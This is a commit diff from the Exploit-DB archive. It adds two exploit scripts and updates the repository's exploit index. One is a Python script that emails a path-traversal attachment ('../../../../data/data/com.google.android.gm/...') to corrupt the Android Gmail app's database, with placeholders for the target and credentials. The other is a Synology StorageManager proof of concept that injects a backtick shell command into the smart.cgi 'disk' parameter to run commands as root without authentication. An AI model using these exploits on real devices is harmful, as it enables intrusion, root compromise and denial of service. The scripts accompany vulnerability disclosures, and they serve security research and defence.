DB: 2017-11-29
4 changes to exploits/shellcodes Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting YaBB 1 Gold SP 1 - 'YaBB.pl' Cross-Site Scripting NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation Synology StorageManager 5.2 - Remote Root Command Execution
This commit is contained in:
Offensive Security
parent
dc5ab6ac54
commit
cc349de5d3
4 changed files with 186 additions and 4 deletions
115
exploits/android/dos/43189.py
Executable file
115
exploits/android/dos/43189.py
Executable file
|
|
@ -0,0 +1,115 @@
|
|||
'''
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342
|
||||
|
||||
There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name and any contents can be written to anywhere on the filesystem that the Gmail app can access. This bug has the following limitations:
|
||||
|
||||
1) the email address has to be a non-Gmail and non Gmailified (Hotmail or Yahoo) account
|
||||
2) the file can not overwrite an existing file, it has to be a file that doesn't already exist
|
||||
3) there user has to click to download the attachment (and the path looks a bit weird on the screen)
|
||||
|
||||
It is possible to modify a EmailProviderBody database using this bug by placing a journal file in the databases directory.
|
||||
|
||||
Below is a PoC of an email that causes this issue. Attached is a python script that will send an email that causes this issue (don't forget to add in the to and from addresses, and your Gmail credentials). WARNING: this PoC will cause Gmail to crash repeatedly, and you will need to re-install it to get it to work again
|
||||
|
||||
Content-Type: multipart/mixed; boundary="---
|
||||
-714A286D976BF3E58D9D671E37CBCF7C"
|
||||
MIME-Version: 1.0
|
||||
Subject: hello
|
||||
To: <address>
|
||||
From: natashenka@google.com
|
||||
|
||||
You will not see this in a MIME-aware mail reader.
|
||||
|
||||
------714A286D976BF3E58D9D671E37CBCF7C
|
||||
Content-Type: text/html
|
||||
|
||||
<html><body><b>test</b></body></html>
|
||||
|
||||
------714A286D976BF3E58D9D671E37CBCF7C
|
||||
Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal"
|
||||
Content-Transfer-Encoding: base64
|
||||
Content-Disposition: attachment; filename="test"
|
||||
|
||||
2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l
|
||||
dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw=
|
||||
|
||||
------714A286D976BF3E58D9D671E37CBCF7C
|
||||
'''
|
||||
|
||||
import os
|
||||
import sys
|
||||
import smtplib
|
||||
import mimetypes
|
||||
|
||||
from optparse import OptionParser
|
||||
|
||||
from email import encoders
|
||||
from email.message import Message
|
||||
from email.mime.audio import MIMEAudio
|
||||
from email.mime.base import MIMEBase
|
||||
from email.mime.image import MIMEImage
|
||||
from email.mime.multipart import MIMEMultipart
|
||||
from email.mime.text import MIMEText
|
||||
import subprocess
|
||||
import random
|
||||
|
||||
|
||||
def main():
|
||||
|
||||
|
||||
|
||||
FROM_ADDRESS = "YOUR FROM ADDRESS HERE"
|
||||
YOUR_CREDENTIAL = "GET A GOOGLE ACCOUNT TEMPORARY PASSWORD AND PUT IT HERE"
|
||||
TO_ADDRESS = "ACCOUNT TO ATTACK HERE"
|
||||
|
||||
|
||||
|
||||
composed = """Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="----714A286D976BF3E58D9D671E37CBCF7C"
|
||||
MIME-Version: 1.0
|
||||
Subject: hello image2adfdfs1
|
||||
To: """+ TO_ADDRESS +"""
|
||||
From: """ + FROM_ADDRESS + """
|
||||
|
||||
You will not see this in a MIME-aware mail reader.
|
||||
|
||||
------714A286D976BF3E58D9D671E37CBCF7C
|
||||
Content-Type: text/html
|
||||
|
||||
<html><body><b>test</b></body></html>
|
||||
|
||||
------714A286D976BF3E58D9D671E37CBCF7C
|
||||
Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal"
|
||||
Content-Transfer-Encoding: base64
|
||||
Content-Disposition: attachment; filename="%2e%2e%2fqpng"
|
||||
|
||||
2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l
|
||||
dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw=
|
||||
|
||||
------714A286D976BF3E58D9D671E37CBCF7C"""
|
||||
|
||||
|
||||
|
||||
|
||||
s = smtplib.SMTP_SSL("smtp.gmail.com")
|
||||
s.login(FROM_ADDRESS, YOUR_CREDENTIAL)
|
||||
you = TO_ADDRESS
|
||||
s.sendmail(FROM_ADDRESS, you, composed)
|
||||
s.quit()
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
67
exploits/cgi/webapps/43190.py
Executable file
67
exploits/cgi/webapps/43190.py
Executable file
|
|
@ -0,0 +1,67 @@
|
|||
'''
|
||||
SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution
|
||||
|
||||
Full report: https://blogs.securiteam.com/index.php/archives/3540
|
||||
Twitter: @SecuriTeam_SSD
|
||||
Weibo: SecuriTeam_SSD
|
||||
|
||||
|
||||
Vulnerability Summary
|
||||
The following advisory describes a remote command execution vulnerability
|
||||
found in Synology StorageManager.
|
||||
|
||||
Storage Manager is “a management application that helps you organize and
|
||||
monitor the storage capacity on your Synology NAS. Depending on the model
|
||||
and number of installed hard drives, Storage Manager helps you accomplish
|
||||
the following tasks:
|
||||
|
||||
Create different types of RAID and non-RAID storage configurations, such as
|
||||
volumes, disk/RAID groups, iSCSI LUNs, and iSCSI Targets.
|
||||
Monitor the overall storage usage of your Synology NAS.
|
||||
Inspect the health of installed hard drives and solid state drives.
|
||||
Use advanced options, such as hot spare drives, SSD TRIM, SSD cache, and
|
||||
more.”
|
||||
|
||||
Credit
|
||||
An independent security researcher, Nigusu Kassahun, has reported this
|
||||
vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
|
||||
|
||||
Vendor response
|
||||
Synology has released patches to address this vulnerability – DSM 5.2-5967-5
|
||||
|
||||
For more information: https://www.synology.com/en-global/releaseNote/DS210+
|
||||
|
||||
Vulnerability details
|
||||
User controlled input is not sufficiently sanitized, and then passed to
|
||||
execve function.
|
||||
|
||||
Successful exploitation of this vulnerability enables a remote
|
||||
unauthenticated user to run commands as root on the machine.
|
||||
|
||||
The vulnerable parameter can be found in
|
||||
/webman/modules/StorageManager/smart.cgi with parameter
|
||||
action=apply&operation=quick&disk=%2Fdev%2Fsda
|
||||
|
||||
Proof of Concept
|
||||
|
||||
===
|
||||
'''
|
||||
|
||||
# Synology StorageManager <= 5.2 Remote Root Command Execution
|
||||
|
||||
|
||||
import httplib
|
||||
|
||||
|
||||
HOST = raw_input("Enter Host: ")
|
||||
|
||||
|
||||
#IDOR to bypass auth and ticks to chain commands
|
||||
|
||||
conn = httplib.HTTPConnection(HOST)
|
||||
|
||||
conn.request("GET","/webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda`id%20>/tmp/LOL`")
|
||||
|
||||
res = conn.geresponse()
|
||||
|
||||
print res.status, res.reason
|
||||
|
|
@ -1 +0,0 @@
|
|||
pdf
|
||||
|
|
@ -5760,6 +5760,7 @@ id,file,description,date,author,type,platform,port
|
|||
43184,exploits/multiple/dos/43184.txt,"Exim 4.89 - 'BDAT' Denial of Service",2017-11-27,meh,dos,multiple,
|
||||
43185,exploits/windows/dos/43185.pl,"KMPlayer 4.2.2.4 - Denial of Service",2017-11-22,R.Yavari,dos,windows,
|
||||
43186,exploits/windows/dos/43186.pl,"Winamp Pro 5.66.Build.3512 - Denial of Service",2017-11-22,R.Yavari,dos,windows,
|
||||
43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
|
@ -9145,7 +9146,7 @@ id,file,description,date,author,type,platform,port
|
|||
40810,exploits/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,local,linux,
|
||||
40811,exploits/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,local,lin_x86-64,
|
||||
40812,exploits/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation",2013-12-16,spender,local,linux,
|
||||
40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,local,linux,
|
||||
40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,local,linux,
|
||||
40847,exploits/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-27,"Gabriele Bonacini",local,linux,
|
||||
40848,exploits/windows/local/40848.java,"WinPower 4.9.0.4 - Local Privilege Escalation",2016-11-29,"Kacper Szurek",local,windows,
|
||||
40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,
|
||||
|
|
@ -26169,7 +26170,7 @@ id,file,description,date,author,type,platform,port
|
|||
22048,exploits/php/webapps/22048.txt,"News Evolution 1.0/2.0 - Include Undefined Variable Command Execution",2002-11-26,frog,webapps,php,
|
||||
22050,exploits/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'imageFolio.cgi?direct' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi,
|
||||
22051,exploits/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'nph-build.cgi' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi,
|
||||
22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",webapps,cgi,
|
||||
22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold SP 1 - 'YaBB.pl' Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",webapps,cgi,
|
||||
22065,exploits/php/webapps/22065.html,"phpBB 2.0.3 - 'search.php' Cross-Site Scripting",2002-12-03,f_a_a,webapps,php,
|
||||
22070,exploits/windows/webapps/22070.py,"OTRS 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",webapps,windows,
|
||||
22071,exploits/php/webapps/22071.txt,"WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",webapps,php,
|
||||
|
|
@ -32715,7 +32716,6 @@ id,file,description,date,author,type,platform,port
|
|||
32664,exploits/ios/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,webapps,ios,8080
|
||||
32665,exploits/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778
|
||||
32666,exploits/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778
|
||||
32667,exploits/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",webapps,hardware,80
|
||||
32668,exploits/php/webapps/32668.txt,"CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities",2014-04-03,"Blessen Thomas",webapps,php,
|
||||
32669,exploits/php/webapps/32669.txt,"PHPcksec 0.2 - 'PHPcksec.php' Cross-Site Scripting",2008-12-17,ahmadbady,webapps,php,
|
||||
32670,exploits/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",webapps,php,
|
||||
|
|
@ -38227,3 +38227,4 @@ id,file,description,date,author,type,platform,port
|
|||
43158,exploits/hardware/webapps/43158.txt,"Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting",2017-11-17,"Keith Thome",webapps,hardware,
|
||||
43177,exploits/multiple/webapps/43177.txt,"CommuniGatePro 6.1.16 - Cross-Site Scripting",2017-11-15,"Boumediene KADDOUR",webapps,multiple,
|
||||
43188,exploits/hardware/webapps/43188.txt,"ZTE ZXDSL 831CII - Improper Access Restrictions",2017-11-27,"Ibad Shah",webapps,hardware,
|
||||
43190,exploits/cgi/webapps/43190.py,"Synology StorageManager 5.2 - Remote Root Command Execution",2017-11-28,SecuriTeam,webapps,cgi,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue